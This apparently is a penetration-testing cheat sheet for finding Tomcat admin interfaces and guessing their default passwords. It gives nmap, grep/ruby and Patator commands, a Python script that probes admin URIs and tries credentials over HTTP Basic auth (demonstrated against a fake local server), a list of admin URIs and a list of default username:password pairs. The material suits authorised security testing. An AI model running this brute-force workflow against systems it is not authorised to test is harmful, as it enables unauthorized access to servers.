Automating checks for Tomcat weak passwords
Checking Tomcat installs for weak passwords is a laborious but often rewarding part of any internal pentest. Here is a quick and dirty cheat sheet that uses Sebastien Macke's awesome Patator to automate the process.
First obtain a list of Tomcat services from an nmap scan. Make sure the scan saves its output in 'grepable' format (the -oG flag), since the next step parses that file. Note that -oG writes to exactly the filename you give it, so name it with the .gnmap extension the later commands expect. For example:
nmap -sS -sV -sC -Pn -p80-89,443,8000-8999 192.168.0.0/24 -oG web-scan.gnmap
Pull out any Tomcat instances from the nmap scan result (I am so sorry, Regex/Ruby gods). The regex matches open TCP ports whose service is http or ssl|http and whose version banner mentions Tomcat; it stops at a comma or tab rather than requiring a trailing comma, so the last port on a Ports: line is picked up too, and ssl|http services are written out as https:
grep -i tomcat web-scan.gnmap | ruby -ne 'next unless h = $_[/Host: ([\d\.]+)/, 1]; $_.scan(/(\d+)\/open\/tcp\/\/(ssl|http)[^,\t]*tomcat[^,\t]*/i).each {|x| puts "#{x[1] =~ /ssl/i ? "https" : "http"}:#{h}:#{x[0]}"}' > tomcat-services.txt
You will now have a list of Tomcat services in scheme:address:port format.
Use patator to quickly identify any Tomcat services that have admin interfaces exposed (see end of page for Tomcat admin URIs). COMBO00, COMBO01 and COMBO02 are the colon-separated columns of file 0 (the services list) and FILE1 is each line of file 1 (the URI list); 404 responses and the placeholder page Tomcat serves at /admin when the admin webapp is not installed are filtered out:
patator.py http_fuzz url=COMBO00://COMBO01:COMBO02/FILE1 0=tomcat-services.txt 1=tomcat-admin-uris.txt -x ignore:code=404 -x ignore:fgrep='administration web application is no longer installed by default' -l services
Admin interfaces are usually the ones that answer 401 Unauthorized. Manually check the 200 OK responses as well: a manager or JMX console that answers 200 without credentials needs no password guessing at all.
Use grep to get a list of the management interfaces (the candidate column of Patator's RESULTS.csv, field 6 in the version used here; check the CSV header if yours differs):
grep '401 Unauthorized' services/RESULTS.csv | cut -d',' -f6 > tomcat-admin-interfaces.txt
You will now have a list of Tomcat services in scheme:address:port:uri format.
Use patator to quickly check for weak passwords (see end of document for a list of default Tomcat passwords). COMBO10:COMBO11 is the user:pass pair from each line of file 1, sent with the user_pass option as HTTP authentication; 401 and 403 responses are ignored so only successful logins are reported:
./patator.py http_fuzz url=COMBO00://COMBO01:COMBO02/COMBO03 user_pass=COMBO10:COMBO11 0=tomcat-admin-interfaces.txt 1=tomcat-account-combos.txt -x ignore:code=403 -x ignore:code=401 -l accounts
Payday will be in the 200 OK responses!
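The whole pipeline above, as an added example that is not part of the original post and is not Patator's code: a standard-library Python script that parses grepable nmap output into scheme:address:port entries, probes admin URIs with the same 401/200/404 logic as the two Patator runs, and tries user:pass combos over HTTP Basic auth. To run offline it spins up a constructed fake Tomcat on a loopback port; the gnmap sample, the fake server and the short credential list are all made up for the demo. Point find_admin_interfaces and check_credentials at the output of tomcat_services and the real URI and password lists to use it against a scan.

```python
"""Offline, stdlib-only walk-through of the cheat sheet: grepable nmap output -> Tomcat
services -> exposed admin URIs -> default-credential check. Added example, not Patator's
or the post's code; the gnmap sample and the fake Tomcat server are constructed."""
import base64
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError, URLError

# Constructed nmap -oG lines: plain and SSL Tomcat, one entry last on its line, one non-HTTP port.
SAMPLE_GNMAP = (
    "Host: 192.168.0.10 ()\tPorts: 8080/open/tcp//http//Apache Tomcat/Coyote JSP engine 1.1/"
    "\tIgnored State: closed (1009)\n"
    "Host: 192.168.0.11 ()\tPorts: 443/open/tcp//ssl|http//Apache Tomcat 9.0.50/, "
    "8443/open/tcp//ssl|http//Apache Tomcat/Coyote JSP engine 1.1/, "
    "8009/open/tcp//ajp13//Apache Jserv (Protocol v1.3)/\tIgnored State: closed (1008)\n"
)
# Open TCP port, service http or ssl|http, banner mentioning Tomcat; the match ends at a
# comma or tab, so the last port on a Ports: line (which has no trailing comma) is caught.
PORT_RE = re.compile(r'(\d+)/open/tcp//(ssl\|http|http)[^,\t]*tomcat[^,\t]*', re.I)
NOT_INSTALLED = 'administration web application is no longer installed by default'

def tomcat_services(gnmap_text):
    """Step 1: return 'scheme:address:port' strings, the format fed to Patator."""
    found = []
    for line in gnmap_text.splitlines():
        host = re.match(r'Host: ([\d.]+)', line)
        if host and 'Ports:' in line:
            for port, service in PORT_RE.findall(line):
                scheme = 'https' if service.lower().startswith('ssl') else 'http'
                found.append(f'{scheme}:{host.group(1)}:{port}')
    return found

def fetch(url, user_pass=None, timeout=5):
    """GET url, optionally with Basic auth; returns (status, body), or (None, '') if unreachable."""
    req = urllib.request.Request(url)
    if user_pass is not None:
        req.add_header('Authorization', 'Basic ' + base64.b64encode(user_pass.encode()).decode())
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors='replace')
    except HTTPError as err:    # urllib raises 401/403/404 rather than returning them
        return err.code, err.read().decode(errors='replace')
    except URLError:            # refused, reset, timed out
        return None, ''

def find_admin_interfaces(services, uris):
    """Step 2: 401 => admin interface, 200 => check by hand; 404 and the stub are dropped."""
    admin, review = [], []
    for svc in services:
        scheme, address, port = svc.split(':')
        for uri in uris:
            status, body = fetch(f'{scheme}://{address}:{port}/{uri}')
            if status == 401:
                admin.append(f'{svc}:{uri}')
            elif status == 200 and NOT_INSTALLED not in body:
                review.append(f'{svc}:{uri}')
    return admin, review

def check_credentials(interfaces, combos):
    """Step 3: try each user:pass against each interface; a 200 is a hit."""
    hits = []
    for iface in interfaces:
        scheme, address, port, uri = iface.split(':', 3)
        for combo in combos:
            if fetch(f'{scheme}://{address}:{port}/{uri}', user_pass=combo)[0] == 200:
                hits.append((iface, combo))
                break           # one working login per interface is enough
    return hits

class FakeTomcat(BaseHTTPRequestHandler):
    """Constructed stand-in: manager/html behind Basic auth (tomcat:tomcat), admin/
    serving Tomcat's 'no longer installed' stub, everything else 404."""
    VALID = 'Basic ' + base64.b64encode(b'tomcat:tomcat').decode()
    def do_GET(self):
        if self.path == '/manager/html' and self.headers.get('Authorization') == self.VALID:
            self._reply(200, b'Tomcat Web Application Manager')
        elif self.path == '/manager/html':
            self._reply(401, b'401 Unauthorized', 'Basic realm="Tomcat Manager Application"')
        elif self.path == '/admin/':
            self._reply(200, b'The ' + NOT_INSTALLED.encode())
        else:
            self._reply(404, b'404 Not Found')
    def _reply(self, code, body, challenge=None):
        self.send_response(code)
        if challenge:
            self.send_header('WWW-Authenticate', challenge)
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def run_demo(uris=('status/', 'admin/', 'manager/html'), combos=('admin:admin', 'tomcat:tomcat')):
    """Steps 2 and 3 against the fake Tomcat on an ephemeral loopback port."""
    with HTTPServer(('127.0.0.1', 0), FakeTomcat) as server:
        port = server.server_address[1]
        threading.Thread(target=server.serve_forever, daemon=True).start()
        admin, review = find_admin_interfaces([f'http:127.0.0.1:{port}'], uris)
        hits = check_credentials(admin, combos)
        server.shutdown()
    return {'port': port, 'admin': admin, 'review': review, 'hits': hits}
```

Against real targets the https entries need a TLS context that tolerates the self-signed certificates most internal Tomcats carry, and the loop should be rate-limited: the manager's LockOutRealm locks an account after a handful of failures, so blasting the whole password list at one interface can hide a valid default behind a 403.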
Supporting Files
Common Admin Interfaces
A list of URIs for common Tomcat admin interfaces (eg. tomcat-admin-uris.txt as used above). Several of these (web-console, jmx-console, invoker) are JBoss consoles rather than Tomcat's own, but JBoss runs on an embedded Tomcat and banners as such, so they are worth checking on anything nmap reports as Tomcat.
status/
admin/
web-console/
jmx-console/
admin-console/
manager/html
web-console/Invoker
jmx-console/HtmlAdaptor
invoker/JMXInvokerServlet
Common Default Passwords
List of common default passwords for Tomcat admin interfaces (eg. tomcat-account-combos.txt as above). Credits to Chris Sullo.
admin:
admin:Password1
admin:admin
admin:j5Brn9
admin:password
admin:password1
admin:tomcat
both:tomcat
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:
tomcat:Password1
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:tomcat